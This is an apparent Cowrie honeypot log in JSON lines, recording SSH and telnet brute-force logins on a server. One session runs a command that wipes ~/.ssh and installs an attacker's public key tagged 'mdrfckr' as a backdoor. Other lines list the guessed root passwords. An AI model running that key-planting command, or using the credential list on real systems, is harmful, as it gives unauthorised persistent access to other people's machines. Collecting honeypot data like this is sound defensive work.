{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:57:48.602620Z","src_ip":"45.88.8.215","session":"28ce02d6f6be"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T15:57:48.603714Z","src_ip":"45.88.8.215","session":"28ce02d6f6be"}
{"eventid":"cowrie.login.success","username":"root","password":"Nara@123","message":"login attempt [root/Nara@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:57:50.826550Z","src_ip":"45.88.8.215","session":"28ce02d6f6be"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:57:51.273297Z","src_ip":"45.88.8.215","session":"28ce02d6f6be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54990,"dst_ip":"1.2.3.4","dst_port":23,"session":"c38523fa35ea","protocol":"telnet","message":"New connection: 212.227.125.160:54990 (1.2.3.4:23) [session: c38523fa35ea]","sensor":"my-vps","timestamp":"2025-08-26T15:58:03.279324Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55680,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3761a79991b","protocol":"ssh","message":"New connection: 212.227.235.229:55680 (1.2.3.4:22) [session: e3761a79991b]","sensor":"my-vps","timestamp":"2025-08-26T15:58:14.658287Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:58:15.379381Z","src_ip":"212.227.235.229","session":"e3761a79991b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T15:58:15.380454Z","src_ip":"212.227.235.229","session":"e3761a79991b"}
{"eventid":"cowrie.session.closed","duration":12.385308265686035,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:58:15.664567Z","src_ip":"212.227.125.160","session":"c38523fa35ea"}
{"eventid":"cowrie.login.success","username":"root","password":"Password2017","message":"login attempt [root/Password2017] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:58:18.645391Z","src_ip":"212.227.235.229","session":"e3761a79991b"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:58:19.861348Z","src_ip":"212.227.235.229","session":"e3761a79991b"}
{"eventid":"cowrie.session.connect","src_ip":"125.21.59.218","src_port":59714,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3c26e2405b3","protocol":"ssh","message":"New connection: 125.21.59.218:59714 (1.2.3.4:22) [session: f3c26e2405b3]","sensor":"my-vps","timestamp":"2025-08-26T15:58:55.106625Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:58:55.108674Z","src_ip":"125.21.59.218","session":"f3c26e2405b3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:58:55.236753Z","src_ip":"125.21.59.218","session":"f3c26e2405b3"}
{"eventid":"cowrie.login.success","username":"root","password":"ovh","message":"login attempt [root/ovh] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:58:55.741308Z","src_ip":"125.21.59.218","session":"f3c26e2405b3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:58:56.049992Z","src_ip":"125.21.59.218","session":"f3c26e2405b3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T15:58:56.051094Z","src_ip":"125.21.59.218","session":"f3c26e2405b3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T15:58:56.052108Z","src_ip":"125.21.59.218","session":"f3c26e2405b3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:58:56.178880Z","src_ip":"125.21.59.218","session":"f3c26e2405b3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:58:56.450246Z","src_ip":"125.21.59.218","session":"f3c26e2405b3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T15:58:56.451037Z","src_ip":"125.21.59.218","session":"f3c26e2405b3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T15:58:56.579211Z","src_ip":"125.21.59.218","session":"f3c26e2405b3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:58:56.580095Z","src_ip":"125.21.59.218","session":"f3c26e2405b3"}
{"eventid":"cowrie.session.connect","src_ip":"125.21.59.218","src_port":60130,"dst_ip":"1.2.3.4","dst_port":22,"session":"1bf8c18998b8","protocol":"ssh","message":"New connection: 125.21.59.218:60130 (1.2.3.4:22) [session: 1bf8c18998b8]","sensor":"my-vps","timestamp":"2025-08-26T15:58:56.702754Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:58:56.704674Z","src_ip":"125.21.59.218","session":"1bf8c18998b8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:58:56.829816Z","src_ip":"125.21.59.218","session":"1bf8c18998b8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T15:58:57.333734Z","src_ip":"125.21.59.218","session":"1bf8c18998b8"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:58:58.463002Z","src_ip":"125.21.59.218","session":"1bf8c18998b8"}
{"eventid":"cowrie.session.connect","src_ip":"125.21.59.218","src_port":60588,"dst_ip":"1.2.3.4","dst_port":22,"session":"5df2217b6b3a","protocol":"ssh","message":"New connection: 125.21.59.218:60588 (1.2.3.4:22) [session: 5df2217b6b3a]","sensor":"my-vps","timestamp":"2025-08-26T15:58:58.587477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:58:58.588541Z","src_ip":"125.21.59.218","session":"5df2217b6b3a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:58:58.714318Z","src_ip":"125.21.59.218","session":"5df2217b6b3a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:58:59.258548Z","src_ip":"125.21.59.218","session":"5df2217b6b3a"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:58:59.386032Z","src_ip":"125.21.59.218","session":"f3c26e2405b3"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:58:59.386903Z","src_ip":"125.21.59.218","session":"5df2217b6b3a"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":37036,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dde780b80c2","protocol":"ssh","message":"New connection: 193.32.162.145:37036 (1.2.3.4:22) [session: 2dde780b80c2]","sensor":"my-vps","timestamp":"2025-08-26T15:59:17.226195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:59:17.227282Z","src_ip":"193.32.162.145","session":"2dde780b80c2"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T15:59:17.257279Z","src_ip":"193.32.162.145","session":"2dde780b80c2"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"solana","message":"login attempt [ubuntu/solana] failed","sensor":"my-vps","timestamp":"2025-08-26T15:59:17.349996Z","src_ip":"193.32.162.145","session":"2dde780b80c2"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:59:18.383049Z","src_ip":"193.32.162.145","session":"2dde780b80c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63433,"dst_ip":"1.2.3.4","dst_port":22,"session":"265ca753bee1","protocol":"ssh","message":"New connection: 212.227.235.229:63433 (1.2.3.4:22) [session: 265ca753bee1]","sensor":"my-vps","timestamp":"2025-08-26T15:59:42.465197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T15:59:42.466130Z","src_ip":"212.227.235.229","session":"265ca753bee1"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T15:59:42.628702Z","src_ip":"212.227.235.229","session":"265ca753bee1"}
{"eventid":"cowrie.login.failed","username":"marquis","password":"marquis","message":"login attempt [marquis/marquis] failed","sensor":"my-vps","timestamp":"2025-08-26T15:59:43.238486Z","src_ip":"212.227.235.229","session":"265ca753bee1"}
{"eventid":"cowrie.login.failed","username":"marquis","password":"marquis1","message":"login attempt [marquis/marquis1] failed","sensor":"my-vps","timestamp":"2025-08-26T15:59:44.373900Z","src_ip":"212.227.235.229","session":"265ca753bee1"}
{"eventid":"cowrie.login.failed","username":"marquis","password":"marquis123","message":"login attempt [marquis/marquis123] failed","sensor":"my-vps","timestamp":"2025-08-26T15:59:45.508277Z","src_ip":"212.227.235.229","session":"265ca753bee1"}
{"eventid":"cowrie.login.failed","username":"marquis","password":"marquis1234","message":"login attempt [marquis/marquis1234] failed","sensor":"my-vps","timestamp":"2025-08-26T15:59:46.642756Z","src_ip":"212.227.235.229","session":"265ca753bee1"}
{"eventid":"cowrie.login.failed","username":"marquis","password":"marquis12345","message":"login attempt [marquis/marquis12345] failed","sensor":"my-vps","timestamp":"2025-08-26T15:59:47.776949Z","src_ip":"212.227.235.229","session":"265ca753bee1"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:59:48.911362Z","src_ip":"212.227.235.229","session":"265ca753bee1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34206,"dst_ip":"1.2.3.4","dst_port":23,"session":"72cd8c37adbf","protocol":"telnet","message":"New connection: 212.227.125.160:34206 (1.2.3.4:23) [session: 72cd8c37adbf]","sensor":"my-vps","timestamp":"2025-08-26T16:01:00.864835Z"}
{"eventid":"cowrie.session.closed","duration":30.545165300369263,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:01:31.409925Z","src_ip":"212.227.125.160","session":"72cd8c37adbf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":26638,"dst_ip":"1.2.3.4","dst_port":22,"session":"68c4b6287490","protocol":"ssh","message":"New connection: 212.227.235.229:26638 (1.2.3.4:22) [session: 68c4b6287490]","sensor":"my-vps","timestamp":"2025-08-26T16:02:57.791472Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:02:57.793193Z","src_ip":"212.227.235.229","session":"68c4b6287490"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27021,"dst_ip":"1.2.3.4","dst_port":22,"session":"498da97992fb","protocol":"ssh","message":"New connection: 212.227.235.229:27021 (1.2.3.4:22) [session: 498da97992fb]","sensor":"my-vps","timestamp":"2025-08-26T16:02:57.949368Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:02:57.950278Z","src_ip":"212.227.235.229","session":"498da97992fb"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T16:02:58.107235Z","src_ip":"212.227.235.229","session":"498da97992fb"}
